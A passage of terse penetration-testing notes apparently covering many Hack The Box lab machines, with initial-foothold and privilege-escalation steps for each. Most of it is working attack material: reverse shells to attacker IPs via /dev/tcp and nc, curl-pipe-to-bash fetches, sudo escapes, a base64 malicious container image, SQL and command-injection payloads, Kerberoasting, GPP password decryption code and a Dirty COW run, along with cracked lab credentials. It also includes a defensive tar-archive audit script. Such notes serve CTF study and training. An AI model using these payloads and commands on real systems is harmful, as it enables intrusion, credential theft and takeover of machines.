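        print(f"{h.ip} {h.time} {h.field}={h.request!r} cgi={h.cgi_target}")
    print(sources(found))
```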
Privilege_escalation(shelly->root)
`sudo -l` (root) NOPASSWD: /usr/bin/perl
https://gtfobins.github.io/gtfobins/perl/
`sudo /usr/bin/perl -e 'exec "/bin/sh";'`
Initial_Foothold
note all emails on /team.php
root@kali# swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
`nc -nvlp 80` received cred paulbyrd@sneakymailer.htb:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
login Evolution(email app) and found cred developer:m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
ftp login `put cmd.php` and trigger with `curl http://dev.sneakycorp.htb/cmd.php --data-urlencode "cmd=PAYLOAD"`
Privilege_escalation(www-data->low)
`ps -ef` found 'pypi-server' has an arg called '-P /var/www/pypi.sneakycorp.htb/.htpasswd'
crack the /var/www/pypi.sneakycorp.htb/.htpasswd hash, got cred pypi:soufianeelhaoui
/etc/nginx/sites-enabled/pypi.sneakycorp.htb shows it's on pypi.sneakycorp.htb:8080
webpage is about pypiserver 1.3.2 and `ps -ef` found user 'low' running '/home/low/venv/bin/python /opt/scripts/low/install-modules.py'
create package payload structure: ./.pypirc ./setup.py and ./[package name]/__init__.py
suggested payloads: ippsec's(write ssh key),0xdf's(reverse_shell), OR https://github.com/mschwager/0wned
root@kali# python3 setup.py sdist upload -r remote (-r means repo name)
Privilege_escalation(low->root)
`sudo -l` (root) NOPASSWD: /usr/bin/pip3
https://gtfobins.github.io/gtfobins/pip/
TF=$(mktemp -d); echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py; sudo pip3 install $TF
Initial_Foothold
`nc 10.10.10.51 4555` login JAMES Remote Admin 2.3.2 with root:root
`HELP` `listusers` and reset all pass using `setpassword *username* password`
`telnet 10.10.10.51 110` login with `USER *username*` `PASS password` `LIST` `RETR *num*` found mindy:P@55W0rd1!2@
rbash escape with `ssh mindy@10.10.10.51 -t bash` OR -t "sh"
Privilege_escalation
pspy found root running /bin/sh -c python /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
gain full TTY and vi edit /opt/tmp.py with python payload
Initial_Foothold
`./finger-user-enum.pl -t 10.10.10.76 -U /usr/share/seclists/Usernames/Names/names.txt`
found usernames sunny and sammy have logged on
`ssh sunny@10.10.10.76 -p 22022` with password: sunny
`sudo -l` (root) NOPASSWD: /root/troll
`ls -al /root/troll` /root/troll: Permission denied
found sammy hash in /backup/shadow.backup and crack got sammy:cooldude!
`su sammy`
Privilege_escalation(sammy->root)
`sudo -l` (root) NOPASSWD: /usr/bin/wget
https://gtfobins.github.io/gtfobins/wget/
OR use '-O' to force overwrite /etc/passwd or /etc/sudoers
Initial_Foothold
webpage icon 'Magento' `./magescan.phar scan:all swagshop.htb` found version 1.9.0.1 (but gobuster /RELEASE_NOTES.txt shows 1.7.0.2)
found cred pdo_mysql:root:fMVWh7bDHpgZkyfqQXreTjU9:db=swagshop in /app/etc/local.xml for later use
use 37977.py or the poc.py from github to add an admin account for /index.php/admin
Magento eCommerce - Remote Code Execution https://www.exploit-db.com/exploits/37977
https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution https://www.exploit-db.com/exploits/37811
need to edit creds and 'install_date' according to `curl -s 10.10.10.140/app/etc/local.xml | grep date` (also need python mechanize)
`python magento_rce.py 'http://10.10.10.140/index.php/admin' "uname -a"`
Another way, which has been patched (not verified), is https://github.com/lavalamp-/LavaMagentoBD
It's uploading a Magento package in /downloader to gain a webshell
Privilege_escalation(www-data->root)
`sudo -l` (root) NOPASSWD: /usr/bin/vi /var/www/html/*
https://gtfobins.github.io/gtfobins/vi/
`sudo /usr/bin/vi /var/www/html/test`
:set shell=/bin/sh
:shell
OR `sudo /usr/bin/vi /var/www/html/a -c ':!/bin/sh'`
Initial_Foothold
found /news.php?file= LFI(Local File Inclusion)
found cred tomcat:$3cureP4s5w0rd123! "http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml"
login 8080/host-manager/html with the cred and found nothing useful
based on https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Supported_Manager_Commands
`msfvenom -p java/shell_reverse_tcp lhost=10.10.14.26 lport=9001 -f war -o test.war`
`curl -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/test" --upload-file test.war`
and set listener and trigger with `curl http://10.10.10.194:8080/test`
Privilege_escalation(tomcat->ash)
/var/www/html/files/16162020_backup.zip zip2john and crack got password 'admin@it'
`su ash` with the password works
Privilege_escalation(ash->root)
ash has GID 116(lxd)
normal alpine container: https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
m0noc's 656 bytes container: echo QlpoOTFBWSZTWaxzK54ABPR/p86QAEBoA//QAA3voP/v3+AACAAEgACQAIAIQAK8KAKCGURPUPJGRp6gNAAAAGgeoA5gE0wCZDAAEwTAAADmATTAJkMAATBMAAAEiIIEp5CepmQmSNNqeoafqZTxQ00HtU9EC9/dr7/586W+tl+zW5or5/vSkzToXUxptsDiZIE17U20gexCSAp1Z9b9+MnY7TS1KUmZjspN0MQ23dsPcIFWwEtQMbTa3JGLHE0olggWQgXSgTSQoSEHl4PZ7N0+FtnTigWSAWkA+WPkw40ggZVvYfaxI3IgBhip9pfFZV5Lm4lCBExydrO+DGwFGsZbYRdsmZxwDUTdlla0y27s5Euzp+Ec4hAt+2AQL58OHZEcPFHieKvHnfyU/EEC07m9ka56FyQh/LsrzVNsIkYLvayQzNAnigX0venhCMc9XRpFEVYJ0wRpKrjabiC9ZAiXaHObAY6oBiFdpBlggUJVMLNKLRQpDoGDIwfle01yQqWxwrKE5aMWOglhlUQQUit6VogV2cD01i0xysiYbzerOUWyrpCAvE41pCFYVoRPj/B28wSZUy/TaUHYx9GkfEYg9mcAilQ+nPCBfgZ5fl3GuPmfUOB3sbFm6/bRA0nXChku7aaN+AueYzqhKOKiBPjLlAAvxBAjAmSJWD5AqhLv/fWja66s7omu/ZTHcC24QJ83NrM67KACLACNUcnJjTTHCCDUIUJtOtN+7rQL+kCm4+U9Wj19YXFhxaXVt6Ph1ALRKOV9Xb7Sm68oF7nhyvegWjELKFH3XiWstVNGgTQTWoCjDnpXh9+/JXxIg4i8mvNobXGIXbmrGeOvXE8pou6wdqSD/F3JFOFCQrHMrng= | base64 -d > bob.tar.bz2
`lxd init` (accept all default)
`lxc image import bob.tar.bz2 --alias bobImage`
`lxc init bobImage bobVM -c security.privileged=true`
`lxc config device add bobVM realRoot disk source=/ path=r`
`lxc start bobVM`
`lxc exec bobVM -- /bin/sh`
Initial_Foothold
tcp/8080 jamovi 'Rj Editor' code execution: system("id",intern = TRUE)
Privilege_escalation(jamovi_container-root->bolt_container-www-data)
unzip bolt-administration.omv and found cred matt@talkative.htb:jeO09ufhWD<s janit@talkative.htb:bZ89h}V<S_DA saul@talkative.htb:)SQWGm>9KHEA in xdata.json
/bolt/login with admin:jeO09ufhWD<s
SSTI(Server Side Template Injection) themes/index.twig add: {{['bash -c "PAYLOAD"']|filter('system')}}
Maintenance>Clear_the_cache and refresh main page got code execution
Privilege_escalation(bolt_container-www-data->saul)
`cat /proc/net/fib_trie` found IP 172.17.0.14
`ssh saul@172.17.0.1` )SQWGm>9KHEA
Privilege_escalation(saul->Rock_Chat_container-root)
docker analysis `ps auxww | grep docker` upload nmap and scan local found 27017
`./chisel_1.7.7_linux_amd64 server -p 8000 --reverse`
upload to target and `./chisel_1.7.7_linux_amd64 client 10.10.14.6:8000 R:27017:172.17.0.2:27017`
`apt install mongodb-clients` and `mongo` which will connect to the localhost:27017
`show databases` found non-default db:meteor `use meteor` `db.getCollectionNames()` `db.users.find()`
and update our rocket_chat user to admin role: `db.users.update({"_id": "4T6XJCNEWz3xqN8LK"}, { $set: { "roles" : ["admin"]}})`
tcp/3000 rocket_chat>Integrations>New_Integration>web_hooks:
An Incoming WebHook will listen for HTTP requests and post some messages based on the content of the request.
An Outgoing WebHook will process chat messages in Rocket Chat and send HTTP data when certain criteria are met.
create Incoming_WebHook(Post_to_Channel #general, Post_as *our_rocket_chat_user*, and the Script with payload)
payload using https://www.revshells.com/ “node.js#2” also need: const require = console.log.constructor('return process.mainModule.require')();
save webhook got its URL,set listener and curl the URL
Privilege_escalation(Rock_Chat_container-root->ROOT)
https://github.com/stealthcopter/deepce scan container found 'dac_read_search' marked in red
https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3
http://stealth.openwall.net/xSports/shocker.c
edit the shocker.c to read root.txt instead of /etc/shadow
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#cap_dac_override
Even though the scan result shows there is no 'cap_dac_override' and `capsh --print` also shows that, the overwrite script works
by the way, `capsh --print` needs libcap and libcap2-bin installed https://command-not-found.com/capsh
And overwrite /etc/passwd to get a root shell
Initial_Foothold
gobuster found /webservices/wp scan with `wpscan -u http://10.10.10.88/webservices/wp/ --enumerate p,t,u`
wpscan shows 'gwolle-gb Version: 2.3.10' but 'http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt' shows a hint: '* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D'
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion https://www.exploit-db.com/exploits/38861
serving the php-reverse-shell.php as wp-load.php and `curl http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.26/`
Privilege_escalation(www-data->onuma)
`sudo -l` (onuma) NOPASSWD: /bin/tar
https://gtfobins.github.io/gtfobins/tar/
`sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash`
Privilege_escalation(onuma->root)
pspy found root is running '/bin/bash /usr/sbin/backuperer'
`watch -n 1 'systemctl list-timers'`
ippsec video: In the 'sleep 30' time window, overwrite(cp) the /var/tmp/*random*.gz with our own (which contains a SUID file owned by root, created from kali (chmod 6555)) and wait for the 'tar extract' to preserve the root permission on the SUID file.
0xdf's read root.txt oneliner: cd /dev/shm; start=$(find /var/tmp -maxdepth 1 -type f -name ".*"); cur=$(find /var/tmp -maxdepth 1 -type f -name ".*"); while [ "$start" == "$cur" -o "$cur" == "" ] ; do sleep 10; cur=$(find /var/tmp -maxdepth 1 -type f -name ".*"); done; echo "File changed... copying here"; cp $cur .; fn=$(echo $cur | cut -d'/' -f4); tar -zxf $fn; rm var/www/html/robots.txt; ln -s /root/root.txt var/www/html/robots.txt; rm $fn; tar czf $fn var; mv $fn $cur; rm $fn; rm -rf var
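The race above works because root's tar restores setuid bits, uid 0 ownership and symlinks exactly as the archive states them. As an added example (not the writeup's or backuperer's code), a pre-extraction audit over archive metadata that flags those members; the archive is constructed inline and expected_uid=1000 is an assumption about who should own the backed-up tree.

```python
import io
import posixpath
import stat
import tarfile
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Finding:
    member: str
    reason: str


def _escapes(base_dir: str, target: str) -> bool:
    """True if target, resolved relative to base_dir inside the archive, leaves the archive root."""
    if target.startswith("/"):
        return True
    norm = posixpath.normpath(posixpath.join(base_dir, target))
    return norm == ".." or norm.startswith("../")


def audit_tar(data: bytes, expected_uid: Optional[int] = None) -> List[Finding]:
    """Inspect archive metadata (no extraction) for members a root-run tar should not restore verbatim."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf.getmembers():
            # Path traversal: "../x" or "/x" lands outside the extraction directory.
            if _escapes(".", m.name):
                findings.append(Finding(m.name, "path escapes the extraction directory"))
            # setuid/setgid is what turns a copied shell into a root shell once
            # root's tar restores the bits together with uid 0 ownership.
            if m.mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append(Finding(m.name, f"setuid/setgid bit set (mode {m.mode:04o})"))
            if expected_uid is not None and m.uid != expected_uid and (m.isfile() or m.isdir()):
                findings.append(Finding(m.name, f"owner uid {m.uid}, expected {expected_uid}"))
            # A symlink out of the tree makes a later diff/cat by root read arbitrary files.
            if m.issym() and _escapes(posixpath.dirname(m.name), m.linkname):
                findings.append(Finding(m.name, f"symlink leaves the archive: {m.linkname}"))
    return findings


def safe_to_extract(data: bytes, expected_uid: Optional[int] = None) -> bool:
    return not audit_tar(data, expected_uid)


def build_sample_archive(tampered: bool = True) -> bytes:
    """Constructed sample, not a real backup: a tar.gz of var/www/html as a tampered backup might look."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        def add_file(name, content, mode, uid, gid):
            info = tarfile.TarInfo(name)
            info.size = len(content)
            info.mode, info.uid, info.gid = mode, uid, gid
            tf.addfile(info, io.BytesIO(content))

        add_file("var/www/html/index.html", b"<html></html>\n", 0o644, 1000, 1000)
        if tampered:
            # root-owned setuid member (placeholder bytes, not a binary)
            add_file("var/www/html/bash", b"\x7fELF constructed placeholder", 0o6555, 0, 0)
            link = tarfile.TarInfo("var/www/html/robots.txt")
            link.type = tarfile.SYMTYPE
            link.linkname = "/root/root.txt"
            link.mode, link.uid, link.gid = 0o777, 1000, 1000
            tf.addfile(link)
            add_file("../outside.txt", b"constructed\n", 0o644, 1000, 1000)
    return buf.getvalue()


if __name__ == "__main__":
    for f in audit_tar(build_sample_archive(), expected_uid=1000):
        print(f"{f.member}: {f.reason}")
```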
Initial_Foothold
put random text in the 'JSON validator' and google the error msg
https://blog.doyensec.com/2019/07/22/jackson-gadgets.html
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"')
Privilege_escalation(pericles->root)
pspy found root is running '/bin/bash /usr/bin/timer_backup.sh'
and it's writable -rwxrw-rw- 1 pericles pericles 88 Jul 28 01:05 /usr/bin/timer_backup.sh
echo payload to it and wait for root to run it
`echo -e '\nbash -i >& /dev/tcp/10.10.14.8/443 0>&1' >> /usr/bin/timer_backup.sh`
Initial_Foothold
nmap found 'nostromo 1.9.6'
nostromo 1.9.6 - Remote Code Execution https://www.exploit-db.com/exploits/47837
`python 47837.py 10.10.10.165 80 "bash -c 'bash -i >& /dev/tcp/10.10.14.26/9001 0>&1'"`
Privilege_escalation(www-data->david)
linpeas.sh found david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ in /var/nostromo/conf/.htpasswd
cracked david:Nowonly4me does not work for `su david`
found -rw-r--r-- 1 david david 1915 Oct 25 2019 /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
`curl 10.10.10.165/~david/protected-file-area/backup-ssh-identity-files.tgz` got 401 Unauthorized
`wget http://david:Nowonly4me@10.10.10.165/~david/protected-file-area/backup-ssh-identity-files.tgz`
OR just cp to /dev/shm and use nc to transfer
`tar -zxvf backup-ssh-identity-files.tgz` got an encrypted id_rsa
`ssh2john home/david/.ssh/id_rsa > david-key-hash`
`john david-key-hash --wordlist=/usr/share/wordlists/rockyou.txt` password: hunter
`ssh -i home/david/.ssh/id_rsa david@10.10.10.165`
Privilege_escalation(david->root)
Failed: `sudo -l` need david's password
found -rwx------ 1 david david 363 Oct 25 2019 /home/david/bin/server-stats.sh
which has a line `/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat`
`/usr/bin/journalctl --help` -n --lines[=INTEGER] Number of journal entries to show
https://gtfobins.github.io/gtfobins/journalctl/#sudo `sudo journalctl` and `!/bin/sh`
we can drag the terminal height till it's less than 5 lines, which makes 'journalctl' page its output through 'less', so that we can inject '!/bin/sh' and get root
Initial_Foothold
gobuster dir found /dev `curl http://10.10.10.79/dev/hype_key > hype_key`
cyberchef From hex (delimiter: space) output is an RSA PRIVATE KEY
OR just `cat hype_key | xxd -r -p > hype_key`
Failed: crack with hashcat and rockyou.txt
tcp/443 webpage shows heartbleed logo
OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions) https://www.exploit-db.com/exploits/32745
`for i in $(seq 1 10000); do python 32745.py 10.10.10.79 | grep -v '00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00' >> mem-dump.txt; done`
found a repeated base64 string 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' in the mem-dump.txt
decode it got 'heartbleedbelievethehype' which decrypts the ssh key
`openssl rsa -in hype_key -out hype_key_decrypted`
`ssh -i hype_key_decrypted hype@10.10.10.79`
Privilege_escalation 1(hype->root)
`history` shows a lot of commands about tmux
`tmux -S /.devs/dev_sess` got a root session
if 'open terminal failed: missing or unsuitable terminal: tmux-256color'
`export TERM=xterm`
Privilege_escalation 2(hype->root)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) https://www.exploit-db.com/exploits/40839
`gcc -pthread 40839.c -o test -lcrypt` then `./test` (the PoC writes a root-equivalent user 'firefart' into /etc/passwd with the password you type)
`su firefart` with that password
Initial_Foothold 1
gobuster dir found /administrative
Manual SQL injection login bypass: username `admin' -- -` with any password (0xdf's variant: `admin' or 1=1 limit 1;-- -`)
OR `ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=0xdf' -w /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt -x http://127.0.0.1:8080 -H "Content-Type: application/x-www-form-urlencoded" --fw 206` (--fw 206 hides responses with the failed-login word count)
read files with a UNION + LOAD_FILE() injection in Burp: uname=admin' union select 1,LOAD_FILE("/etc/passwd"),3,4,5,6-- -&password=admin
"/etc/apache2/sites-enabled/000-default.conf" shows "/var/www/writer.htb/writer.wsgi"
"/var/www/writer.htb/writer.wsgi" shows "from writer import app as application"
"/var/www/writer.htb/writer/__init__.py" shows "mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer')"
also shows a command injection sink: os.system("mv {} {}.jpg".format(local_filename, local_filename)), where local_filename is taken from the 'story image from URL' field, so shell metacharacters in the filename run as commands
host a file with the payload as its name on kali (the base64 decodes to `ping -c 1 10.10.14.26`) and point the URL field at it: `touch 'test.jpg; echo cGluZyAtYyAxIDEwLjEwLjE0LjI2ICAK|base64 -d|bash;'`
tcpdump sees the ping; now swap the base64 for a reverse shell: `echo 'bash -c "bash -i >& /dev/tcp/10.10.14.26/9001 0>&1"' | base64`
Initial_Foothold 2
`smbmap -H 10.10.11.101 -u kyle -p ToughPasswordToCrack` found writer2_project has read&write
`smbclient -U kyle //10.10.11.101/writer2_project ToughPasswordToCrack`
OR `mount -t cifs -o 'username=kyle,password=ToughPasswordToCrack' //10.10.11.101/writer2_project /mnt`
`cd writer` `get view.py` and add os.system("curl http://10.10.14.3/bash.sh|bash") inside 'def home_page(request):'
`put view.py` and trigger it right away with 'story image from URL' http://127.0.0.1/test.jpg
Privilege_escalation(www-data->kyle)
found "/var/www/writer2_project/manage.py" `python3 manage.py dbshell`
`show databases;use dev;show tables;select * from auth_user;` got kyle's password hash (Django pbkdf2_sha256, hashcat -m 10000)
cracked by hashcat kyle:marcoantonio and `su kyle`
Privilege_escalation(kyle->john)
pspy found root is running `/bin/sh -c /usr/bin/cp /root/.scripts/master.cf /etc/postfix/master.cf` every 2 mins
/etc/postfix/master.cf defines the services and filters postfix runs on mail as it arrives
it has a line "flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}"
which means postfix runs /etc/postfix/disclaimer as user john whenever mail arrives
-rwxrwxr-x 1 root filter 1021 Jul 31 07:06 /etc/postfix/disclaimer
kyle has groups=1000(kyle),997(filter),1002(smbgroup), so kyle can write the group-writable /etc/postfix/disclaimer
add payload (echo our_pub_key >> /home/john/.ssh/authorized_keys) to disclaimer and send mail right away, before root's 2-minute cron runs again
`swaks --to root@writer.htb --from test@writer.htb --header "test" --body "test" --server 127.0.0.1`
Privilege_escalation(john->root)
john has groups=1001(john),1003(management)
drwxrwxr-x 2 root management 4096 Jul 28 09:24 /etc/apt/apt.conf.d
pspy found root is running `/usr/bin/apt-get update`
`echo 'apt::Update::Pre-Invoke {"PAYLOAD";};' > /etc/apt/apt.conf.d/000-shell` (apt config syntax needs the `;` after the string and after the closing brace) and wait for the next root `apt-get update`
Initial_Foothold
`smbmap -H 10.10.10.100` found 'Replication' share is readable
`smbget -Rr smb://10.10.10.100/Replication` then `find . -type f -exec grep -Hi password {} \; 2>/dev/null`
found a GPP cpassword in ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (not a hash: it is AES-encrypted with the key Microsoft published, so it decrypts directly)
`gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ` got cred active.htb\SVC_TGS:GPPstillStandingStrong2k18
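What gpp-decrypt does under the hood, as an added example (not code from the Active box or from the gpp-decrypt tool): the 32-byte AES key is the one Microsoft published in MS-GPPREF ("Password Encryption"); a cpassword is AES-256-CBC over the UTF-16LE password with an all-zero IV and PKCS#7 padding, base64-encoded with the '=' padding stripped. find_gpp_creds scans Groups.xml text the way the grep above does and decrypts every cpassword it finds. It needs the `cryptography` package; the Groups.xml snippet is constructed for the demo around the cpassword value from the notes.

```python
"""Decrypt Group Policy Preferences cpassword values from Groups.xml."""
import base64
import re

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Published in MS-GPPREF section 2.2.1.1.4; the same key in every domain.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

PROPERTIES_RE = re.compile(r"<Properties\b[^>]*>")
CPASSWORD_RE = re.compile(r'cpassword="([^"]+)"')
USERNAME_RE = re.compile(r'userName="([^"]+)"')


def gpp_decrypt(cpassword: str) -> str:
    """Return the cleartext password for one cpassword attribute value."""
    # GPP drops the base64 '=' padding; restore it before decoding.
    data = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    padded = decryptor.update(data) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    plaintext = unpadder.update(padded) + unpadder.finalize()
    return plaintext.decode("utf-16-le")


def find_gpp_creds(groups_xml: str) -> list:
    """Return (userName, cleartext) for every <Properties> element carrying a cpassword."""
    creds = []
    for props in PROPERTIES_RE.findall(groups_xml):
        cpw = CPASSWORD_RE.search(props)
        user = USERNAME_RE.search(props)
        if cpw and user:
            creds.append((user.group(1), gpp_decrypt(cpw.group(1))))
    return creds


# Constructed sample in the shape of SYSVOL\...\MACHINE\Preferences\Groups\Groups.xml.
SAMPLE_GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    '<Groups><User name="active.htb\\SVC_TGS" image="2">'
    '<Properties action="U" newName="" fullName="" description="" '
    'cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" '
    'changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" '
    'userName="active.htb\\SVC_TGS"/></User></Groups>'
)


if __name__ == "__main__":
    for user, pw in find_gpp_creds(SAMPLE_GROUPS_XML):
        print("%s:%s" % (user, pw))
```

Point it at the real file with `find_gpp_creds(open(path).read())`; the same routine works for the other Preferences XML files that carry cpassword (Services, ScheduledTasks, DataSources, Drives), since they share the attribute name and encryption.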
`smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18`
smb: \SVC_TGS\desktop\> get user.txt
Privilege_escalation
`bloodhound-python -u SVC_TGS -p GPPstillStandingStrong2k18 -ns 10.10.10.100 -d active.htb -c all --zip`
`python3 /root/impacket/build/scripts-3.10/GetADUsers.py -dc-ip 10.10.10.100 -all active.htb/svc_tgs`
`python3 /root/impacket/build/scripts-3.10/GetUserSPNs.py -dc-ip 10.10.10.100 active.htb/svc_tgs -request`
the hash starts with $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$ (etype 23 = RC4-HMAC, hashcat -m 13100)
`python3 /root/impacket/build/scripts-3.10/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out`
`hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force` got cred Administrator:Ticketmaster1968
`smbclient //10.10.10.100/C$ -U active.htb\\administrator%Ticketmaster1968` `get \users\administrator\desktop\root.txt`
`psexec.py active.htb/administrator@10.10.10.100`
Initial_Foothold
https://atsserver.acute.local/about.html lists user names at the bottom
page top right "New Starter Forms" downloads 'New_Starter_Checklist_v7.docx', which gives the default password Password1! and a link
`exiftool New_Starter_Checklist_v7.docx` shows 'Description: Created on Acute-PC01'
the docx links to https://atsserver.acute.local/Acute_Staff_Access, which is PowerShell Web Access (PSWA)
log in to PSWA with edavies:Password1! and 'Computer name': Acute-PC01
get a meterpreter shell for the next step
Privilege_escalation(edavies->imonk)
meterpreter> `keyscan_start` `keyscan_dump` captures the edavies user (a bot) opening a PS session as imonks
replicate the bot's actions:
PS> $pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
PS> Enter-PSSession -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
OR using '-ScriptBlock' instead
PS> Invoke-Command -ComputerName ATSServer -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Get-Command }
PS> Invoke-Command -ComputerName ATSServer -Credential $cred -ConfigurationName dc_manage -ScriptBlock { Get-Alias }
PS> Invoke-Command -ComputerName ATSServer -Credential $cred -ConfigurationName dc_manage -ScriptBlock { cat ..\Desktop\user.txt }
Privilege_escalation(imonk->jmorgan)
PS> Invoke-Command -ComputerName ATSServer -Credential $cred -ConfigurationName dc_manage -ScriptBlock { cat \Users\imonks\desktop\wm.ps1 }
wm.ps1 has the PS script block that gets code execution as acute\jmorgan; many attempts to reuse it fail, maybe $securepasswd is too long
PS> Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc64.exe -e cmd 10.10.14.6 443') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
#note: cat = Get-Content, sc = Set-Content
PS> Invoke-Command -ScriptBlock { ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
`rlwrap -cAr nc -lnvp 443` and we got the jmorgan shell
Privilege_escalation(jmorgan->awallace)
PS> `net localgroup Administrators` shows ACUTE\jmorgan is a local admin on Acute-PC01
PS> reg save HKLM\sam sam.bak ; reg save HKLM\system sys.bak
`secretsdump.py -sam sam.bak -system sys.bak LOCAL` dumps the local account hashes; cracking gives Password@123, which awallace reuses
PS> $pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
Privilege_escalation(awallace->Site_Admin)
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { cat \program files\keepmeon\keepmeon.bat }
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do ( if not "%%x" == "%~0" call "%%x" )
"REM" denotes a comment. for-loop variables are written %x in cmd and %%x in a batch file ("x" could just as well be "i","item","file")
In a batch file %0 is the name of the batch file itself and %~0 is %0 with surrounding quotes stripped, which is how the loop skips calling keepmeon.bat itself
so keepmeon.bat calls every other .bat under its directory (/R recurses) every 5 mins as Lois, who "could add people to become “site admin”" per New_Starter_Checklist_v7.docx
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'}
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net group Site_Admin /domain }
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { cat \users\administrator\desktop\root.txt }
OR build a payload with msfvenom, upload it, and run it the same way for a shell
PS> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { \program files\keepmeon\9001.exe }
Initial_Foothold
`python3 IOXIDResolver.py -t 10.10.10.213` found dead:beef::b885:d62a:d679:573f, then `nmap -6` that IPv6 address
`cme smb dead:beef::b885:d62a:d679:573f --shares -u '' -p ''` shows the 'backup' share has 'READ' access (needs crackmapexec 5.1.6dev or newer)
`smbclient \\\\dead:beef::b885:d62a:d679:573f\\backup` anonymous login found backup.zip; `smbget smb://apt/backup/backup.zip` (with apt mapped to the IPv6 address in /etc/hosts)
zip2john and crack got pass: iloveyousomuch unzip got ntds.dit and SYSTEM
